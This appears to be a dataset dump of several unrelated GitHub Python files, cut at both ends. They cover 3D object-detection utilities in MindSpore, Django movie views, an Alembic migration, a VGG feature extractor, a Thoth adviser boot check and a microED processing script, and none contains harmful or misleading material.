int(device_id)\n\n\nclass AllReduce(nn.Cell):\n def __init__(self):\n super(AllReduce, self).__init__()\n self.all_reduce = ops.AllReduce()\n\n def construct(self, x):\n return self.all_reduce(x)\n\n\ndef nms_hm(heat_map, kernel=3, reso=1):\n kernel = int(kernel / reso)\n if kernel % 2 == 0:\n kernel += 1\n\n pad = (kernel - 1) // 2\n maxpool2d = nn.MaxPool2d(kernel_size=kernel, stride=1, pad_mode='pad', padding=pad)\n hmax = maxpool2d(heat_map)\n\n eq_index = (hmax == heat_map)\n\n return heat_map * eq_index\n\n\ndef get_iou_3d(pred_corners, target_corners):\n \"\"\"\n :param corners3d: (N, 8, 3) in rect coords\n :param query_corners3d: (N, 8, 3)\n :return: IoU\n \"\"\"\n min = ops.Minimum()\n max = ops.Maximum()\n zeros=ops.Zeros()\n\n A, B = pred_corners, target_corners\n N = A.shape[0]\n\n # init output\n iou3d = zeros((N,),ms.float32)\n\n # for height overlap, since y face down, use the negative y\n min_h_a = - A[:, 0:4, 1].sum(axis=1) / 4.0\n max_h_a = - A[:, 4:8, 1].sum(axis=1) / 4.0\n min_h_b = - B[:, 0:4, 
1].sum(axis=1) / 4.0\n max_h_b = - B[:, 4:8, 1].sum(axis=1) / 4.0\n\n # overlap in height\n h_max_of_min = max(min_h_a, min_h_b)\n h_min_of_max = min(max_h_a, max_h_b)\n h_overlap = max(zeros(h_min_of_max.shape,ms.float32),h_min_of_max - h_max_of_min)\n\n # x-z plane overlap\n for i in range(N):\n bottom_a, bottom_b = Polygon(ops.transpose(A[i, 0:4, [0, 2]],(1,0))), Polygon(ops.transpose(B[i, 0:4, [0, 2]],(1,0)))\n\n if bottom_a.is_valid and bottom_b.is_valid:\n # check is valid, A valid Polygon may not possess any overlapping exterior or interior rings.\n bottom_overlap = bottom_a.intersection(bottom_b).area\n else:\n bottom_overlap =0\n\n overlap3d = bottom_overlap * h_overlap[i]\n union3d = bottom_a.area * (max_h_a[i] - min_h_a[i]) + bottom_b.area * (max_h_b[i] - min_h_b[i]) - overlap3d\n\n iou3d[i] = overlap3d / union3d\n\n return iou3d\n\n\ndef select_topk(heat_map, K=100):\n '''\n Args:\n heat_map: heat_map in [N, C, H, W]\n K: top k samples to be selected\n score: detection threshold\n\n Returns:\n\n '''\n batch, cls, height, width = heat_map.shape\n\n # First select topk scores in all classes and batchs\n # [N, C, H, W] -----> [N, C, H*W]\n heat_map = heat_map.view(batch, cls, -1)\n # Both in [N, C, K]\n topk_scores_all, topk_inds_all = ops.topk(heat_map, K)\n\n # topk_inds_all = topk_inds_all % (height * width) # todo: this seems redudant\n topk_ys = ops.cast(topk_inds_all / width,ms.float32)\n topk_xs = ops.cast(topk_inds_all % width,ms.float32)\n\n # assert isinstance(topk_xs, ops.cuda.FloatTensor)\n # assert isinstance(topk_ys, ops.cuda.FloatTensor)\n\n # Select topK examples across channel (classes)\n # [N, C, K] -----> [N, C*K]\n topk_scores_all = topk_scores_all.view(batch, -1)\n # Both in [N, K]\n topk_scores, topk_inds = ops.topk(topk_scores_all, K)\n topk_clses = ops.cast(topk_inds / K,ms.float32)\n\n # assert isinstance(topk_clses, ops.cuda.FloatTensor)\n\n # First expand it as 3 dimension\n topk_inds_all = _gather_feat(topk_inds_all.view(batch, -1, 1), topk_inds).view(batch, K)\n topk_ys = _gather_feat(topk_ys.view(batch, -1, 1), topk_inds).view(batch, K)\n topk_xs = _gather_feat(topk_xs.view(batch, -1, 1), topk_inds).view(batch, K)\n\n return topk_scores, topk_inds_all, topk_clses, topk_ys, topk_xs\n\n\ndef _gather_feat(feat, ind):\n '''\n Select specific indexs on feature map\n Args:\n feat: all results in 3 dimensions\n ind: positive index\n\n Returns:\n\n '''\n channel = feat.shape[-1]\n size=ms.Tensor(np.array([ind.shape[0], ind.shape[1], channel]),ms.int32)\n ind=ops.expand_dims(ind,-1).expand(size)\n feat = feat.gather_elements(1, ind)\n\n return feat\n\n\ndef get_iou3d(pred_bboxes, target_bboxes):\n num_query = target_bboxes.shape[0]\n\n # compute overlap along y axis\n min_h_a = - (pred_bboxes[:, 1] + pred_bboxes[:, 4] / 2)\n max_h_a = - (pred_bboxes[:, 1] - pred_bboxes[:, 4] / 2)\n min_h_b = - (target_bboxes[:, 1] + target_bboxes[:, 4] / 2)\n max_h_b = - (target_bboxes[:, 1] - target_bboxes[:, 4] / 2)\n\n # overlap in height\n h_max_of_min = ops.max(min_h_a, min_h_b)\n h_min_of_max = ops.min(max_h_a, max_h_b)\n h_overlap = (h_min_of_max - h_max_of_min).clamp_(min=0)\n\n # volumes of bboxes\n pred_volumes = pred_bboxes[:, 3] * pred_bboxes[:, 4] * pred_bboxes[:, 5]\n target_volumes = target_bboxes[:, 3] * target_bboxes[:, 4] * target_bboxes[:, 5]\n\n # derive x y l w alpha\n pred_bboxes = pred_bboxes[:, [0, 2, 3, 5, 6]]\n target_bboxes = target_bboxes[:, [0, 2, 3, 5, 6]]\n\n # convert bboxes to corners\n pred_corners = get_corners(pred_bboxes)\n target_corners = 
get_corners(target_bboxes)\n iou_3d = pred_bboxes.new_zeros(num_query)\n\n for i in range(num_query):\n ref_polygon = Polygon(pred_corners[i])\n target_polygon = Polygon(target_corners[i])\n overlap = ref_polygon.intersection(target_polygon).area\n # multiply bottom overlap and height overlap\n # for 3D IoU\n overlap3d = overlap * h_overlap[i]\n union3d = ref_polygon.area * (max_h_a[0] - min_h_a[0]) + target_polygon.area * (max_h_b[i] - min_h_b[i]) - overlap3d\n iou_3d[i] = overlap3d / union3d\n\n return iou_3d\n\n\ndef get_corners(bboxes):\n # bboxes: x, y, w, l, alpha; N x 5\n corners = ops.zeros((bboxes.shape[0], 4, 2), dtype=ms.float32)\n x, y, w, l = bboxes[:, 0], bboxes[:, 1], bboxes[:, 2], bboxes[:, 3]\n # compute cos and sin\n cos_alpha = ops.cos(bboxes[:, -1])\n sin_alpha = ops.sin(bboxes[:, -1])\n # front left\n corners[:, 0, 0] = x - w / 2 * cos_alpha - l / 2 * sin_alpha\n corners[:, 0, 1] = y - w / 2 * sin_alpha + l / 2 * cos_alpha\n\n # rear left\n corners[:, 1, 0] = x - w / 2 * cos_alpha + l / 2 * sin_alpha\n corners[:, 1, 1] = y - w / 2 * sin_alpha - l / 2 * cos_alpha\n\n # rear right\n corners[:, 2, 0] = x + w / 2 * cos_alpha + l / 2 * sin_alpha\n corners[:, 2, 1] = y + w / 2 * sin_alpha - l / 2 * cos_alpha\n\n # front right\n corners[:, 3, 0] = x + w / 2 * cos_alpha - l / 2 * sin_alpha\n corners[:, 3, 1] = y + w / 2 * sin_alpha + l / 2 * cos_alpha\n\n return corners\n\n\ndef uncertainty_guided_prune(separate_depths, GRM_uncern, cfg, depth_range=None, initial_use_uncern=True):\n '''\n Description:\n Prune the unresonable depth prediction results calculated by SoftGRM based on uncertainty.\n Input:\n separate_depths: The depths solved by SoftGRM. shape: (val_objs, 20).\n GRM_uncern: The estimated variance of SoftGRM equations. shape: (val_objs, 20).\n cfg: The config object.\n depth_range: The range of reasonable depth. Format: (depth_min, depth_max)\n Output:\n pred_depths: The solved depths. shape: (val_objs,)\n pred_uncerns: The solved uncertainty. 
shape: (val_objs,)\n '''\n objs_depth_list = []\n objs_uncern_list = []\n sigma_param = cfg.TEST.UNCERTAINTY_GUIDED_PARAM\n for obj_id in range(separate_depths.shape[0]):\n obj_depths = separate_depths[obj_id]\n obj_uncerns = GRM_uncern[obj_id]\n # Filter the depth estimations out of possible range.\n if depth_range is not None:\n valid_depth_mask = (obj_depths > depth_range[0]) & (obj_depths < depth_range[1])\n obj_depths = obj_depths[valid_depth_mask]\n obj_uncerns = obj_uncerns[valid_depth_mask]\n # If all objects are filtered.\n if obj_depths.shape[0] == 0:\n objs_depth_list.append(ops.expand_dims(separate_depths[obj_id].mean(),0))\n objs_uncern_list.append(ops.expand_dims(GRM_uncern[obj_id].mean(), 0))\n continue\n\n if initial_use_uncern:\n considered_index = obj_uncerns.argmin()\n else:\n considered_index = find_crowd_index(obj_depths)\n\n considered_mask = ops.zeros(obj_depths.shape, dtype=ms.bool_)\n considered_mask[considered_index] = True\n obj_depth_mean = obj_depths[considered_index]\n obj_depth_sigma = ops.sqrt(obj_uncerns[considered_index])\n flag = True\n search_cnt = 0\n while flag == True:\n search_cnt += 1\n flag = False\n new_considered_mask = (obj_depths > obj_depth_mean - sigma_param * obj_depth_sigma) & (\n obj_depths < obj_depth_mean + sigma_param * obj_depth_sigma)\n # Reconstructed condition (the comparison operator was lost in scraping):\n # stop once the mask is unchanged, i.e. no new elements are considered,\n # or after 20 search iterations.\n if considered_mask.equal(new_considered_mask).sum() == new_considered_mask.shape[0] or search_cnt > 20:\n objs_depth_list.append(ops.expand_dims(obj_depth_mean,0))\n objs_uncern_list.append(ops.expand_dims((obj_depth_sigma * obj_depth_sigma),0))\n break\n else:\n considered_mask = new_considered_mask\n considered_depth = obj_depths[considered_mask]\n considered_uncern = obj_uncerns[considered_mask]\n considered_w = 1 / considered_uncern\n considered_w = considered_w / considered_w.sum()\n obj_depth_mean = (considered_w * considered_depth).sum()\n obj_depth_sigma = ops.sqrt((considered_w * considered_uncern).sum())\n flag = True\n\n pred_depths = ops.cat(objs_depth_list, axis=0)\n pred_uncerns = ops.cat(objs_uncern_list, axis=0)\n return pred_depths, pred_uncerns\n\n\ndef find_crowd_index(obj_depths):\n '''\n Description:\n Find the depth at the most crowded index for each object.\n Input:\n obj_depths: The estimated depths of an object. shape: (num_depth,).\n Output:\n crowd_index: Int.\n '''\n num_depth = obj_depths.shape[0]\n\n depth_matrix = ops.expand_dims(obj_depths,0).expand(num_depth, num_depth)\n cost_matrix = (ops.expand_dims(obj_depths,1) - depth_matrix).abs() # cost_matrix shape: (num_depth, num_depth)\n crowd_index = cost_matrix.sum(axis = 1).argmin()\n return crowd_index\n\n\ndef error_from_uncertainty(uncern):\n '''\n Description:\n Get the error derived from uncertainty.\n Input:\n uncern: uncertainty tensor. shape: (val_objs, 20)\n Output:\n error: The produced error. shape: (val_objs,)\n '''\n if uncern.ndim != 2:\n raise Exception(\"uncern must be a 2-dim tensor.\")\n weights = 1 / uncern\t# weights shape: (total_num_objs, 20)\n weights = weights / ops.sum(weights, dim = 1, keepdim = True)\n error = ops.sum(weights * uncern, dim = 1)\t# error shape: (valid_objs,)\n return error\n\n\ndef nms_3d(results, bboxes, scores, iou_threshold = 0.2):\n '''\n Description:\n Given the 3D bounding boxes of objects and confidence scores, remove the overlapped ones with low confidence.\n Input:\n results: The result tensor for KITTI. shape: (N, 14)\n bboxes: Vertex coordinates of 3D bounding boxes. shape: (N, 8, 3)\n scores: Confidence scores. 
shape: (N).\n iou_threshold: The IOU threshold for filtering overlapped objects. Type: float.\n Output:\n preserved_results: results after NMS.\n '''\n descend_index = ops.flip(ops.argsort(scores, axis = 0), dims = (0,))\n results = results[descend_index, :]\n sorted_bboxes = bboxes[descend_index, :, :]\n\n box_indices = np.arange(0, sorted_bboxes.shape[0])\n suppressed_box_indices = []\n tmp_suppress = []\n\n while len(box_indices) > 0:\n\n if box_indices[0] not in suppressed_box_indices:\n selected_box = box_indices[0]\n tmp_suppress = []\n\n for i in range(len(box_indices)):\n if box_indices[i] != selected_box:\n # expand_dims adds the batch dimension that get_iou_3d expects;\n # the original squeeze(0) was a no-op on an (8, 3) tensor\n selected_iou = get_iou_3d(ops.expand_dims(sorted_bboxes[selected_box], 0), ops.expand_dims(sorted_bboxes[box_indices[i]], 0))[0]\n if selected_iou > iou_threshold:\n suppressed_box_indices.append(box_indices[i])\n tmp_suppress.append(i)\n\n box_indices = np.delete(box_indices, tmp_suppress, axis=0)\n box_indices = box_indices[1:]\n\n preserved_index = np.setdiff1d(np.arange(0, sorted_bboxes.shape[0]), np.array(suppressed_box_indices), assume_unique=True)\n preserved_results = results[preserved_index.tolist(), :]\n\n return preserved_results\n\n","repo_name":"CPREgroup/MonoDDE_new","sub_path":"model_utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":14510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"20653513614","text":"INPUT_WIDTH = 30\nINPUT_HEIGHT = 30\nN_PLAYERS = 10\nINPUT_CHANNELS = 4 + N_PLAYERS\n'''\nInput channels encoding:\ncell type (one-hot): normal, gold, energy\nbase type (binary): is_base\noccupation status (binary): can_be_attacked\nowner (one-hot): you, enemy_1, enemy_2, ... enemy_10?\nn = 3 + 1 + 10(?) = 14\n'''","repo_name":"evilnose/colorfight_arsenal","sub_path":"dqn/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"32939313892","text":"from typing import Any, Optional, Type\nfrom django.db.models.query import QuerySet\nfrom django.forms.models import BaseModelForm\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom django.views.generic import TemplateView, ListView, UpdateView, CreateView, DetailView\nfrom django.views import View\nfrom movies.forms import MovieCreateUpdateForm\nfrom movies.models import Movie, MultiMovieSet\n\n\nclass HomePageView(TemplateView):\n template_name = \"pages/home.html\"\n\n\nclass AboutPageView(TemplateView):\n template_name = \"pages/about.html\"\n\n\nclass MovieListView(ListView):\n model = Movie\n context_object_name = 'movies'\n\nclass MovieCreateView(CreateView):\n model = Movie\n template_name = 'movies/movie_add.html'\n form_class = MovieCreateUpdateForm\n success_url = '/movies/add'\n\nclass MovieUpdateView(UpdateView):\n model = Movie\n template_name = 'movies/movie_add.html'\n form_class = MovieCreateUpdateForm\n success_url = '/movies'\n\n\nclass MultiMovieSetCreateView(CreateView):\n model = MultiMovieSet\n fields = ['title', 'movies']\n template_name = 'movies/multi_movie_set_add.html'\n success_url = '/movies/add/multi_movie_set'\n\n def get_form(self, form_class: Type[BaseModelForm] | None = None) -> BaseModelForm:\n form = super().get_form(form_class)\n form.fields['movies'].required = False\n return 
form","repo_name":"mitch-jensen/movie_database","sub_path":"movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8929366575","text":"\"\"\"Create stats table\n\nRevision ID: 0002\nRevises: 0001\nCreate Date: 2018-11-30 17:46:54.067383\n\n\"\"\"\nfrom alembic import op\nfrom sqlalchemy import Column, TEXT, INT, ForeignKey, PrimaryKeyConstraint\n\n\nrevision = '0002'\ndown_revision = '0001'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table('stats',\n Column('id', TEXT, ForeignKey('urls.id'), index=True),\n Column('ip', TEXT, nullable=False),\n Column('count', INT, nullable=False, default=0),\n PrimaryKeyConstraint('id', 'ip'))\n\n\ndef downgrade():\n op.drop_table('stats')\n","repo_name":"pgan002/shorturl","sub_path":"alembic/versions/0002_create_stats_table.py","file_name":"0002_create_stats_table.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"932171424","text":"from __future__ import annotations\n\nfrom model.io.load import LoadModel\nfrom model.io.save import SaveModel\n\n\ndef main():\n obj = LoadModel(\"tests/3d/tileEntities/tileEntities.obj\")\n for texture in obj.MaterialLibrary.textureHandler.textures:\n print(texture.name)\n\n SaveModel(obj, \"export/yourMum\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jokil123/mineways-block-entity-generator","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"43223891441","text":"import pandas as pd\nfrom skbio.diversity import beta_diversity\nfrom skbio.stats.ordination import *\nfrom plotnine import *\n\n\ndf_abundance = pd.read_csv('abundance.csv').T\ndf_map = pd.read_csv('mapper.csv')\ndf_map.index = df_map['SampleID']\nEnv = []\n\n\ndf_abundance.columns = df_abundance.iloc[0]\ndf_abundance = df_abundance.drop('samples',axis=0)\n\nfor i in df_abundance.index:\n Env.append(df_map.loc[i, 'Env'])\n\nbc_dm = beta_diversity(\"braycurtis\", df_abundance, df_abundance.index)\nbc_pc = pd.DataFrame(pcoa(bc_dm, number_of_dimensions = 2).samples.values.tolist(),df_abundance.index, columns = ['PC1', 'PC2'])\ndf_abundance['Env'] = Env\nprint(bc_pc)\n\nfig = (ggplot(bc_pc,aes(x = 'PC1', y = 'PC2',color ='Env'))\n + geom_point(size=1)\n + theme(figure_size= (10,10))\n + theme(panel_grid_major = element_blank(), panel_grid_minor = element_blank(), panel_background = element_blank())\n + theme(axis_line = element_line(color=\"gray\", size = 5))\n + theme(legend_key_size = 5)\n + theme(legend_position = (0.9,0.9))\n + stat_ellipse()\n + xlab('PC1')\n + ylab('PC2')\n )\nprint(fig)\n","repo_name":"LudensZhang/EXPERT_8folds_prj2","sub_path":"pcoa_plot.py","file_name":"pcoa_plot.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70793220520","text":"from collections import namedtuple\n\nimport torch\nfrom torchvision import models\n\n\nclass Vgg16(torch.nn.Module):\n def __init__(self, requires_grad=False):\n super(Vgg16, self).__init__()\n vgg_pretrained_features = models.vgg16(pretrained=True).features\n self.slice1 = torch.nn.Sequential()\n self.slice2 = torch.nn.Sequential()\n self.slice3 = torch.nn.Sequential()\n self.slice4 = 
torch.nn.Sequential()\n for x in range(4):\n self.slice1.add_module(str(x), vgg_pretrained_features[x])\n for x in range(4, 9):\n self.slice2.add_module(str(x), vgg_pretrained_features[x])\n for x in range(9, 16):\n self.slice3.add_module(str(x), vgg_pretrained_features[x])\n for x in range(16, 23):\n self.slice4.add_module(str(x), vgg_pretrained_features[x])\n if not requires_grad:\n for param in self.parameters():\n param.requires_grad = False\n\n def forward(self, X):\n h = self.slice1(X)\n h_relu1_2 = h\n h = self.slice2(h)\n h_relu2_2 = h\n h = self.slice3(h)\n h_relu3_3 = h\n h = self.slice4(h)\n h_relu4_3 = h\n vgg_outputs = namedtuple(\"VggOutputs\", ['relu1_2', 'relu2_2', 'relu3_3', 'relu4_3'])\n out = vgg_outputs(h_relu1_2, h_relu2_2, h_relu3_3, h_relu4_3)\n return out\n\n\n# create a module to normalize input image tensors (which have shape B x C x H x W)\nclass Normalization(torch.nn.Module):\n def __init__(self, mean, std):\n super(Normalization, self).__init__()\n # .view the mean and std to make them [C x 1 x 1] so that they can\n # directly work with image Tensor of shape [B x C x H x W].\n # B is batch size. C is number of channels. H is height and W is width.\n self.mean = torch.tensor(mean).view(-1, 1, 1)\n self.std = torch.tensor(std).view(-1, 1, 1)\n\n def forward(self, img):\n # normalize img\n return (img - self.mean) / self.std","repo_name":"tayfunates/intuitive-physics","sub_path":"models/O2P2/loss/vgg.py","file_name":"vgg.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"70368995560","text":"import sys\nsys.path.insert(0,'/data/')\nimport os\n\nfrom ResolveTools.utils.utils import printwtime\nfrom ResolveTools.segmentation.brainregions import add_region_toadata\n\nresult = sys.argv[1] # results_N21_wmesmer_combined\n\nresultfolder = \"/data/baysor/04_baysor/\"+result\n#roi = sys.argv[2] #\"R2_W0A2\"\n\nrois = os.listdir(resultfolder+\"/rois/\")\n\nfor roi in rois:\n printwtime(roi)\n adatafiles = list(filter(lambda x: \".loom\" in x, os.listdir(resultfolder+\"/rois/\"+roi)))\n for adatafile in adatafiles:\n printwtime(\" \"+adatafile)\n add_region_toadata(resultfolder+\"/rois/\"+roi+\"/\"+adatafile,\n \"/data/confocal/03_annotation/Confocal_\"+roi+\"_annotated_regions.npz\")\n\n\n\n\n","repo_name":"valentinwust/ResolveTools","sub_path":"scripts/baysor/scripts/final_03_add_region.py","file_name":"final_03_add_region.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24324247429","text":"import torch\nimport numpy\nimport random\nfrom udl_vis.Basis.auxiliary import set_random_seed\nprint(torch.__version__) # 1.13.0+cu116\n\nif __name__ == '__main__':\n\n n = 100\n set_random_seed(1)\n\n seed = 1#int(torch.empty((), dtype=torch.int64).random_().item())\n generator = torch.Generator()\n # 不受全局种子限制,设置完后内部仍有种子偏移保证每个epoch都是不同的\n # Function 'torch.Generator()' is not limited by the global seed\n # because there is another seed offset inside it to ensure that each epoch is different\n generator.manual_seed(seed)\n\n def simple_generator():\n # 随着epoch,torch.randperm内部会产生种子偏移,可以通过generator来控制,注意不可以每轮设成一样的\n # When the epoch is increasing, torch.randperm also generates a seed offset inside,\n # which can be controlled by the generator.\n # Note that it cannot be set the same for each epoch\n\n # 仅限于load模型的时候在模型、优化器都载入后,保证数据轮次也是一样的\n # When loading the weights, the 
model and the optimizer are loaded.\n # Besides, the sampled data in dataloader are guaranteed to be the same.\n # See Line: 36-39\n yield torch.randperm(n, generator=generator).tolist()\n\n\n state = generator.get_state()\n\n for i in range(3):\n my_gen = simple_generator()\n # 使得每轮epoch是一样的,但不要这么做,仅限于恢复模型的时候保证数据轮次是一样的\n # It will be make sure each epoch is the same, but don't do this,\n # only when restoring the model to ensure that the sampled data are the same.\n # It should be considered in https://pytorch.org/docs/stable/notes/randomness.html\n print(generator.set_state(state))\n print(generator.get_state().sum())\n # print(torch.get_rng_state().sum())\n print(next(my_gen))\n\n # 跟实例相关的,不是全局的\n # It is related to the instance, not the global.\n print(torch.Generator().get_state().sum())\n","repo_name":"XiaoXiao-Woo/UDL","sub_path":"udl_vis/tests/test_pytorch_dataloader.py","file_name":"test_pytorch_dataloader.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"18"} +{"seq_id":"6214750387","text":"import logging\nimport os\nfrom typing import Generator\nfrom typing import Dict\nfrom typing import Any\nfrom typing import TYPE_CHECKING\n\nimport attr\nfrom thoth.common import get_justification_link as jl\nfrom thoth.common import OpenShift\n\nfrom ..boot import Boot\nfrom ..exceptions import NotAcceptable\n\nif TYPE_CHECKING:\n from ..pipeline_builder import PipelineBuilderContext\n\n_LOGGER = logging.getLogger(__name__)\n\n\n@attr.s(slots=True)\nclass SolvedSoftwareEnvironmentBoot(Boot):\n \"\"\"A boot to check for solved software environment before running any resolution.\"\"\"\n\n _JUSTIFICATION_LINK = jl(\"solved_sw_env\")\n _THOTH_ADVISER_DEPLOYMENT_CONFIGURED_SOLVERS = os.getenv(\"THOTH_ADVISER_DEPLOYMENT_CONFIGURED_SOLVERS\", \"\")\n\n @classmethod\n def should_include(cls, builder_context: \"PipelineBuilderContext\") -> Generator[Dict[str, Any], None, None]:\n \"\"\"Register self, always.\"\"\"\n if builder_context.project.runtime_environment.is_fully_specified() and not builder_context.is_included(cls):\n yield {}\n return None\n\n yield from ()\n return None\n\n def run(self) -> None:\n \"\"\"Check for version clash in packages.\"\"\"\n if self.context.graph.solved_software_environment_exists(\n os_name=self.context.project.runtime_environment.operating_system.name,\n os_version=self.context.project.runtime_environment.operating_system.version,\n python_version=self.context.project.runtime_environment.python_version,\n ):\n return\n\n runtime_environment = self.context.project.runtime_environment\n msg = (\n f\"No observations found for {runtime_environment.operating_system.name!r} in \"\n f\"version {runtime_environment.operating_system.version!r} using \"\n f\"Python {runtime_environment.python_version!r}\"\n )\n\n self.context.stack_info.append(\n {\n \"type\": \"ERROR\",\n \"message\": msg,\n \"link\": self._JUSTIFICATION_LINK,\n }\n )\n\n _LOGGER.warning(\"%s - %s\", msg, self._JUSTIFICATION_LINK)\n _LOGGER.warning(\"Available configurations:\")\n\n configurations = []\n solvers = self._THOTH_ADVISER_DEPLOYMENT_CONFIGURED_SOLVERS.split()\n for solver in solvers:\n solver = solver.strip()\n if not solver:\n continue\n\n item = OpenShift.parse_python_solver_name(solver)\n configurations.append(item)\n\n if item[\"os_name\"] == \"rhel\":\n # Duplicate entry as we can also guide on the same UBI environment. 
UBI and RHEL are binary compatible.\n other_item = dict(item)\n other_item[\"os_name\"] = \"ubi\"\n configurations.append(other_item)\n\n _LOGGER.warning(\"{:<16} {:<16} {:<8}\".format(\"OS name\", \"OS version\", \"Python version\"))\n for conf in sorted(\n configurations,\n key=lambda i: (i[\"os_name\"], i[\"os_version\"], i[\"python_version\"]),\n ):\n self.context.stack_info.append(\n {\n \"message\": f\"Consider using {conf['os_name']!r} in version {conf['os_version']!r} \"\n f\"with Python {conf['python_version']}\",\n \"type\": \"ERROR\",\n \"link\": self._JUSTIFICATION_LINK,\n }\n )\n _LOGGER.warning(\"{:<16} {:<16} {:<8}\".format(conf[\"os_name\"], conf[\"os_version\"], conf[\"python_version\"]))\n\n raise NotAcceptable(msg)\n","repo_name":"thoth-station/adviser","sub_path":"thoth/adviser/boots/solved_software_environment.py","file_name":"solved_software_environment.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"18"} +{"seq_id":"74458396200","text":"#!/usr/bin/env python\n\nimport argparse, codecs, glob, os, platform, shutil, subprocess, sys, time\nfrom datetime import datetime\nfrom threading import Thread\n\nif (__name__ == \"__main__\") :\n args = sys.argv[0:]\n \n explain_user_input = '''\n Method 1 (basic, recommended for interactive running)\n Usage: python run_all.py \n Example: python /Users/kimd999/Dropbox/script/python/cryoEM/AutoMicroED/run_all.py mrc_file.list\n \n Method 2 (advanced, recommended for continuous running)\n Usage: python run_all.py \n Example: python /Users/kimd999/Dropbox/script/python/cryoEM/AutoMicroED/run_all.py mrc_file.list args_file.txt\n \n Note\n Exemplar mrc_file.list would have \\n\\t/Users/kimd999/research/microED/2_20190913_162354.mrc\\n\\t/Users/kimd999/research/microED/3_20190913_163300.mrc\n This mrc_fie.list can be generated by for example, kimd999$ ls $PWD/*.mrc > mrc_file.list\n AutoMicroED will use all mrc files in mrc_file.list until it reaches user specified completeness.\n \n If a user provided file as well, then arguments in there will be used automatically rather than waiting for user to enter input values interactively.\n \n Exemplar input files are in AutoMicroED/templates/input_files'''\n if (len(args) < 2):\n print (explain_user_input)\n exit(1)\n \n ''' \n # this version check doesn't work if later sentences do not conform to python3\n if (str(sys.version[:1]) == \"2\"):\n print (\"AutoMicroED is optimized with python3 rather than python2.\\n\\nTherefore, run\")\n print (\"\\talias python='python3'\")\n print (\"and run AutoMicroED again\")\n print (\"\\n\\nAlternatively a user can do\")\n print (\"\\tpython3 /run_all.py \")\n print (\"\\n\\tIf a user wants to use alias, then put -> alias MicroED=\\\"/home/kimd999/bin/miniconda3/bin/python3.8 /gpustorage/automation/MicroED/Scripts/AutoMicroED/run_all.py\\\"\")\n print (\"\\tinto ~/.bashrc (of course, modify PATH to user's own one)\")\n exit(1) \n\n # \"If a user uses pnnl_kriosgpu, \\\n # alias MicroED=\\\"/home/kimd999/bin/miniconda3/bin/python3.8 /gpustorage/automation/MicroED/Scripts/AutoMicroED/run_all.py\\\" works\n '''\n\n if not hasattr(sys, \"version_info\") or sys.version_info < (3,7):\n raise ValueError(\"Script requires Python 3.7 or higher!\")\n\n\n today = datetime.now()\n time_now = today.strftime('%Y/%m/%d') + \"/\" + str(today.hour) + \":\" + str(today.minute) + \":\" + str(today.second)\n \n py_file = args[0]\n list_of_mrc_file_or_smv_folder = args[1]\n 
list_of_mrc_file_or_smv_folder_w_abs_path = os.path.abspath(list_of_mrc_file_or_smv_folder)\n \n repo_location = os.path.dirname(os.path.abspath(py_file))\n \n util_path = repo_location + \"/util/\"\n sys.path.insert(0, util_path)\n from util import *\n \n args_dict = {} # this should live before args_file_parse\n starting_dir = os.getcwd()\n args_dict['starting_dir'] = starting_dir\n args_dict['repo_location'] = repo_location\n\n\n if (len(args) >= 3):\n args_file = args[2]\n args_file_w_abs_path = os.path.abspath(args_file) \n args_dict['args_file_w_abs_path'] = os.path.abspath(args_file_w_abs_path)\n\n #print (f\"args_dict:{args_dict}\")\n\n if (os.path.isdir(\"output\") == False):\n os.mkdir(\"output\")\n os.chdir(\"output\") \n\n working_folder = today.strftime('%Y%m%d') + \"_\" + str(today.hour) + \"_\" + str(today.minute) + \"_\" + str(today.second)\n \n working_folder_abs_path = os.path.abspath(working_folder)\n \n os.mkdir(working_folder_abs_path)\n os.chdir(working_folder_abs_path)\n \n logfile_name = \"full.log\"\n args_dict['logfile_name_w_abs_path'] = os.path.abspath(logfile_name)\n \n if (os.path.isfile(args_dict['logfile_name_w_abs_path']) == True):\n os.remove(args_dict['logfile_name_w_abs_path'])\n \n args_dict['summary_logfile_name_w_abs_path'] = args_dict['logfile_name_w_abs_path'][:-8] + \"summary.log\"\n\n\n ############### read args file and populate args_dict\n if (len(args) >= 3):\n args_dict_renewed = args_file_parse(args_dict)\n if (args_dict_renewed == False):\n print_this = \"\\nargs_file needs to be updated properly. Please refer (user's AutoMicroED git repo)/templates/args_file/explanation_of_args.txt for more detail.\"\n print_this = print_this + \"\\nAutoMicroED will exit now.\"\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n exit(1)\n else:\n args_dict = args_dict_renewed\n print_this = \"args_dict after population:\" + str(args_dict)\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n \n ############### read args file and populate args_dict\n\n\n print_this = \"working_folder_abs_path:\" + str(working_folder_abs_path)\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n\n print_this = 